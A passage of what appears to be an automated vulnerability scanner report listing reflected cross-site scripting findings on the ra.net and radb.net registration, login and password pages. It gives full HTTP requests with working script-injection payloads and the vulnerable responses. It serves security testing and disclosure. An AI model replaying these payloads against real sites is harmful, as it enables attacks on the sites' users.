STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=3536a"><script>alert(1)</script>ab7085f6462

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:43:55 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45398

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="REFERRED_BY" size=40 maxlength=128 value="3536a"><script>alert(1)</script>ab7085f6462">
...[SNIP]...

1.13. http://www.ra.net/register/ [STATE_OTHER parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the STATE_OTHER request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69ae6"><script>alert(1)</script>fa3ef75ba was submitted in the STATE_OTHER parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=69ae6"><script>alert(1)</script>fa3ef75ba&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_E
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:41:39 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45396

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="STATE_OTHER" size=30 maxlength=20 value="69ae6"><script>alert(1)</script>fa3ef75ba">
...[SNIP]...

1.14. http://www.ra.net/register/ [STREET_ADDRESS parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the STREET_ADDRESS request parameter is copied into the HTML document as plain text between tags. The payload 40fed<script>alert(1)</script>e3b04804c55 was submitted in the STREET_ADDRESS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=40fed<script>alert(1)</script>e3b04804c55&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:41:18 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45384

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<textarea name="STREET_ADDRESS" cols=40 rows=3 wrap=soft>40fed<script>alert(1)</script>e3b04804c55</textarea>
...[SNIP]...

1.15. http://www.ra.net/register/ [TECH_EMAIL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the TECH_EMAIL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1f3"><script>alert(1)</script>fcd7fd3bed1 was submitted in the TECH_EMAIL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=3d1f3"><script>alert(1)</script>fcd7fd3bed1&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:43:06 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45814

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="TECH_EMAIL" size=40 maxlength=60 value="3d1f3"><script>alert(1)</script>fcd7fd3bed1">
...[SNIP]...

1.16. http://www.ra.net/register/ [TECH_FIRST_NAME parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the TECH_FIRST_NAME request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e70"><script>alert(1)</script>9d49c84deff was submitted in the TECH_FIRST_NAME parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=98e70"><script>alert(1)</script>9d49c84deff&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:42:51 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45554

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="TECH_FIRST_NAME" size=14 maxlength=20 value="98e70"><script>alert(1)</script>9d49c84deff">
...[SNIP]...

1.17. http://www.ra.net/register/ [TECH_LAST_NAME parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the TECH_LAST_NAME request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b3db"><script>alert(1)</script>1b71469c970 was submitted in the TECH_LAST_NAME parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=1b3db"><script>alert(1)</script>1b71469c970&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:42:58 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45554

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="TECH_LAST_NAME" size=24 maxlength=30 value="1b3db"><script>alert(1)</script>1b71469c970">
...[SNIP]...

1.18. http://www.ra.net/register/ [UPDATE_EMAIL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the UPDATE_EMAIL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e175"><script>alert(1)</script>094c8d25970 was submitted in the UPDATE_EMAIL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=4e175"><script>alert(1)</script>094c8d25970&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:43:40 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45622

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="UPDATE_EMAIL" size=40 maxlength=60 value="4e175"><script>alert(1)</script>094c8d25970">
...[SNIP]...

1.19. http://www.ra.net/register/ [YOUR_EMAIL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the YOUR_EMAIL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80768"><script>alert(1)</script>f8378e1d2b2 was submitted in the YOUR_EMAIL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=80768"><script>alert(1)</script>f8378e1d2b2&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:42:16 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45622

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="YOUR_EMAIL" size=40 maxlength=60 value="80768"><script>alert(1)</script>f8378e1d2b2">
...[SNIP]...

1.20. http://www.ra.net/register/ [YOUR_FIRST_NAME parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the YOUR_FIRST_NAME request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d63"><script>alert(1)</script>77112afb362 was submitted in the YOUR_FIRST_NAME parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=a9d63"><script>alert(1)</script>77112afb362&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYP
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:42:01 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45398

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="YOUR_FIRST_NAME" size=14 maxlength=20 value="a9d63"><script>alert(1)</script>77112afb362">
...[SNIP]...

1.21. http://www.ra.net/register/ [YOUR_LAST_NAME parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the YOUR_LAST_NAME request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd8b7"><script>alert(1)</script>8064d1efbef was submitted in the YOUR_LAST_NAME parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=dd8b7"><script>alert(1)</script>8064d1efbef&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:42:09 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45379

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="YOUR_LAST_NAME" size=24 maxlength=30 value="dd8b7"><script>alert(1)</script>8064d1efbef">
...[SNIP]...

1.22. https://www.radb.net/login/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.radb.net
Path:	/login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8306"><script>alert(1)</script>a283340e843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/?f8306"><script>alert(1)</script>a283340e843=1 HTTP/1.1
Host: www.radb.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.radb.net/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: goto=L21lbWJlcnMv

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:48:51 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
Set-Cookie: login_error=; path=/; expires=Thu, 22-Sep-2011 12:48:51 GMT
Content-Length: 5315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<HTML>
<head>
<TITLE>RADb: Member Portal: Login</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<STYLE TYPE="text/css">
<!--

body, p, h1, h2, h3, table, td, th, ol, d
...[SNIP]...
<input type="hidden" name="f8306"><script>alert(1)</script>a283340e843" value="1">
...[SNIP]...

1.23. https://www.radb.net/portal/password.epl [REFERER parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.radb.net
Path:	/portal/password.epl

Issue detail

The value of the REFERER request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1e4c"><script>alert(1)</script>fd8acce6c8e934c29 was submitted in the REFERER parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/password.epl?REFERER=https%3A%2F%2Fwww.radb.net%2Flogin%2Fa1e4c"><script>alert(1)</script>fd8acce6c8e934c29&email=&Submit=Request+Password HTTP/1.1
Host: www.radb.net
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.radb.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.radb.net/portal/password.epl
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: goto=L21lbWJlcnMv

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:49:31 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
Content-Length: 7530
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<HTML>
<head>
<TITLE>RADb Member Portal: Get Your Portal Password</TITLE>

<STYLE TYPE="text/css">
<!--
body {
   margin:0px 0px 0px 00px;
   background-color:#444444;
   font-size:12px;
}

body, p, h1, h2,
...[SNIP]...
<input type="hidden" name="REFERER" value="https://www.radb.net/login/a1e4c"><script>alert(1)</script>fd8acce6c8e934c29">
...[SNIP]...

1.24. https://www.radb.net/portal/password.epl [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.radb.net
Path:	/portal/password.epl

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ae11"><script>alert(1)</script>b4f2a58782bf61bfd was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/password.epl?REFERER=https%3A%2F%2Fwww.radb.net%2Flogin%2F&email=1ae11"><script>alert(1)</script>b4f2a58782bf61bfd&Submit=Request+Password HTTP/1.1
Host: www.radb.net
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.radb.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.radb.net/portal/password.epl
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: goto=L21lbWJlcnMv

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:49:35 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
Content-Length: 7530
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<HTML>
<head>
<TITLE>RADb Member Portal: Get Your Portal Password</TITLE>

<STYLE TYPE="text/css">
<!--
body {
